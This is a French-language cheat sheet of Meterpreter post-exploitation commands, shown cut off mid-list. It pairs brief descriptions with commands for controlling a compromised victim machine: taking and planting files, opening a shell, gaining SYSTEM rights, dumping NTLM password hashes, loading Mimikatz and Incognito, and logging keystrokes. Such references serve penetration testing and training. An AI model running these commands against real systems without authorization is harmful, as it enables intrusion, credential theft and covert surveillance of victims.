Sommaire

Meterpreter

1. Commandes de bases

Afficher l’aide

: help

Placer la session en tâche de fond

: background

Disposer d’un shell Ruby

: irb

Charger des modules Meterpreter 

: load <MODULE NAME>

Changer de processus

: migrate

Faire appel à des fichiers ressources

: resource

Exécuter un module de post-exploitation

: run <MODULE NAME>

Obtenir le chemin courant sur la machine attaquante

: getlwd

Obtenir le chemin courant sur la machine victime

: getwd

Afficher les fichiers sur la machine attaquante

: lls

Afficher les fichiers sur la machine victime

: ls

Télécharger un fichier depuis la machine victime

: download source destination

Charger un fichier sur la machine victime

: upload source destination

Faire du forward de port

: portfwd

Transformer Meterpreter en shell standard

: shell

Exécuter une commande sur la machine victime

: execute

Obtenir un résumé des informations de la machine victime

: sysinfo

2. Les commandes avancées

Chercher des fichiers intéressants sur le disque

: search

Obtenir les droits SYSTEM (à partir d’un compte administrateur)

: getsystem

Obtenir les condensats LM/NTLM (injection en mémoire)

: hashdump

Obtenir les condensats LM/NTLM (base de registre)

: smart_hashdump

Charger le module Mimikatz

: load mimikatz / load kiwi

Charger le module Incognito

: load incognito

Migration d’un processus

: migrate <PID>

Démarrer l’enregistrement de frappes clavier

: keyscan_start

Afficher l’ensemble des frappes enregistrées ...